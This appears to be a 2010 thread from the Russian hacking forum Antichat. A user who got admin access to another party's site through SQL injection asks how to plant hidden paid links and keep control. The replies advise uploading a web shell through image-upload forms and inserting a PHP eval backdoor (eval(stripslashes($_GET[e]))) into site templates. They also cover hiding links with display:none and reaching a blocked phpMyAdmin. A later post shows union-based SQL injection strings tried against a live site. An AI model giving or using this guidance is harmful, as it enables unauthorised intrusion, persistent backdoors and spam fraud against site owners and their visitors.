HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.11.2010, 17:00
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Цитата:
Сообщение от MastaBass1  
Такой вопрос, имеется сайт с хорошими показателями тиц и pr, доступ к админки вытащил из sql inj.
Возможно ли впихнуть рекламу( например sape), для заработка с него. Как сделать чтоб ее не запилили, может шел залить, как, какой? Спокойно выполняются js скрипты, можно с помощью них загнать шел на сервер, или еще как?
Сказал бы,что за кмс,если это не самопис то из админки известны способы заливки.

Если самопис какой-то,1.)ищи заливку картинок и пробуй загрузить шелл , 2.)Ищи место куда можно вставить пхп код и чтоб он исполнялся,например если в шаблонах разрешен пхп,то вставляешь туда пхп код например eval(stripslashes($_GET[e])); вызываешь пхпинфо,а дальше уже смотришь по ситуации...
 
Ответить с цитированием

  #2  
Старый 29.11.2010, 17:30
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Цитата:
Сообщение от ~d0s~  
Сказал бы,что за кмс,если это не самопис то из админки известны способы заливки.
Если самопис какой-то,1.)ищи заливку картинок и пробуй загрузить шелл , 2.)Ищи место куда можно вставить пхп код и чтоб он исполнялся,например если в шаблонах разрешен пхп,то вставляешь туда пхп код например eval(stripslashes($_GET[e])); вызываешь пхпинфо,а дальше уже смотришь по ситуации...
TrinetCMS, тоесть пробывать заливать скрипты через всевозможные формы загрузки( фотографии, видео и т.д.). Так а не запилят банер? Есть смысл делать это через Sape, просто при анализе это сайта через http://www.cy-pr.com/, говорят что сапа отвалит больше 1000 $ , вот и решил попробовать.

А какой шелл посоветуете, есть какие-нибудь факи по ним?
 
Ответить с цитированием

  #3  
Старый 29.11.2010, 19:04
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от MastaBass1  
TrinetCMS, тоесть пробывать заливать скрипты через всевозможные формы загрузки( фотографии, видео и т.д.). Так а не запилят банер? Есть смысл делать это через Sape, просто при анализе это сайта через http://www.cy-pr.com/, говорят что сапа отвалит больше 1000 $ , вот и решил попробовать.
А какой шелл посоветуете, есть какие-нибудь факи по ним?
губозакататель еще дадут бесплатный никелированный, если сапа даст больше 1к $, значит сайт с высоким тиц-ем, скорее всего он в сапе уже есть, если нет то за ним следят и спалят появление всяких ссылок очень быстро..
 
Ответить с цитированием

  #4  
Старый 29.11.2010, 19:17
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
губозакататель еще дадут бесплатный никелированный, если сапа даст больше 1к $, значит сайт с высоким тиц-ем, скорее всего он в сапе уже есть, если нет то за ним следят и спалят появление всяких ссылок очень быстро..
Яша 450

Google PageRank (PR) 5

Его нет в сапе, а если умело, может и не запилят?
 
Ответить с цитированием

  #5  
Старый 29.11.2010, 19:41
Чакэ
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме:
90728

Репутация: 62
По умолчанию

Цитата:
Сообщение от MastaBass1  
Яша 450
Google PageRank (PR) 5
Его нет в сапе, а если умело, может и не запилят?
если на сайте нет нормального админа, а только контент-менеджер который дальше админки ничего не знает то можно попробовать скрыть в шаблоне ссылки через display:none, но все же это палево все равно. вдруг завтра как раз решат поставить сапу на сайт а тут хоп - сайт уже в сапе ))
 
Ответить с цитированием

  #6  
Старый 29.11.2010, 19:54
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Цитата:
Сообщение от Чакэ  
если на сайте нет нормального админа, а только контент-менеджер который дальше админки ничего не знает то можно попробовать скрыть в шаблоне ссылки через display:none, но все же это палево все равно. вдруг завтра как раз решат поставить сапу на сайт а тут хоп - сайт уже в сапе ))
Ну посмотрим, а что такое display:none, типо реклама вида Hide, так сапа заблочит за это?!
 
Ответить с цитированием

  #7  
Старый 29.11.2010, 20:30
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Ладно, такой вопрос, если есть доступ через шел к папке phpmyadmin, а из адресной строки доступа нет(403 Forbidden), как открыть доступ к этой директории?
 
Ответить с цитированием

  #8  
Старый 29.11.2010, 20:45
Чакэ
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме:
90728

Репутация: 62
По умолчанию

Цитата:
Сообщение от MastaBass1  
Ладно, такой вопрос, если есть доступ через шел к папке phpmyadmin, а из адресной строки доступа нет(403 Forbidden), как открыть доступ к этой директории?
в этой папке или в корне есть .htaccess? может через него доступ закрыт.
 
Ответить с цитированием

  #9  
Старый 29.11.2010, 20:50
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Цитата:
Сообщение от Чакэ  
в этой папке или в корне есть .htaccess? может через него доступ закрыт.
Понял, поищу, спасибо!
 
Ответить с цитированием

  #10  
Старый 30.11.2010, 15:29
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Делаю запрос

Цитата:
Сообщение от None  
id=2'+union+select+1--
Выходит такая ошибка:

Warning: array_merge() [function.array-merge]: Argument #2 is not an array

Если делаю так

Цитата:
Сообщение от None  
id=2+union+select+1--
Отображается страница с записями

если перед 2 минус ставлю

Цитата:
Сообщение от None  
id=-2+union+select+1--
getData: Incorrect table name '' SQL=SELECT DISTINCT `` AS blabla FROM `` LIMIT 0, 10

Какой запрос сформировать?

Интересно что даже если делаю 1,2,3,4 и т.д.

Цитата:
Сообщение от None  
id=2+union+select+1,2,3,4--
данные отображаются

//обсуждение таких вопросов без указания линков, не эффективно..иногда даже без результата {модер}
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.